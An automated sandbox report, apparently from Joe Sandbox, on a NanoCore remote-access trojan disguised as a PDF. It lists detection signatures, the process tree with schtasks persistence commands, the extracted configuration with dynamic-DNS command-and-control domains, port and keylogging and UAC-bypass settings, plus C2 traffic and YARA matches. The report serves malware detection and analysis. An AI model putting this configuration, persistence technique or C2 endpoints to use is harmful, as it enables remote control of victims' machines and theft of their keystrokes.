
Windows Analysis Report
004349256789197.pdf.scr.exe

Overview

General Information

Sample Name:004349256789197.pdf.scr.exe
Analysis ID:798041
MD5:3ac05bbe35293fbfd0df49ecfb34c461
SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
Tags:exe

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • 004349256789197.pdf.scr.exe (PID: 912 cmdline: C:\Users\user\Desktop\004349256789197.pdf.scr.exe MD5: 3AC05BBE35293FBFD0DF49ECFB34C461)
    • wscript.exe (PID: 5348 cmdline: "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • ihgsvw.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx MD5: 797174324A2A71F55AD4E89DA918B52D)
        • RegSvcs.exe (PID: 3008 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4524 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5040 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ihgsvw.exe (PID: 5040 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
            • RegSvcs.exe (PID: 1724 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 3784 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ihgsvw.exe (PID: 2200 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 2756 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 5176 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 1840 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5948 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 2884 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 2344 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 3384 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 2788 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 5632 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • ihgsvw.exe (PID: 5648 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
    • RegSvcs.exe (PID: 4588 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ihgsvw.exe (PID: 5304 cmdline: "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC MD5: 797174324A2A71F55AD4E89DA918B52D)
      • RegSvcs.exe (PID: 4768 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      
<Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
Source | Rule | Description | Author
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
Source | Rule | Description | Author
29.3.ihgsvw.exe.133eea0.1.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
29.3.ihgsvw.exe.133eea0.1.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth (Nextron Systems)
29.3.ihgsvw.exe.133eea0.1.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
29.3.ihgsvw.exe.133eea0.1.raw.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
29.3.ihgsvw.exe.133eea0.1.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>

      AV Detection

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 3008, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp, ProcessId: 4524, ProcessName: schtasks.exe

      Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 3008, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      No Snort rule has matched


      AV Detection

Source: december2nd.ddns.net | Avira URL Cloud: Label: malware
Source: december2n.duckdns.org | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Avira: detection malicious, Label: DR/AutoIt.Gen
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: 004349256789197.pdf.scr.exe | ReversingLabs: Detection: 44%
Source: 004349256789197.pdf.scr.exe | Virustotal: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | ReversingLabs: Detection: 26%
Source: 22.2.RegSvcs.exe.720000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 10.2.RegSvcs.exe.6210000.7.unpack | Avira: Label: TR/NanoCore.fadte
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: NanoCore (configuration identical to the one listed above)
      Source: 004349256789197.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDC642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C17248 FindFirstFileW,FindClose,

      Networking

      barindex
      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
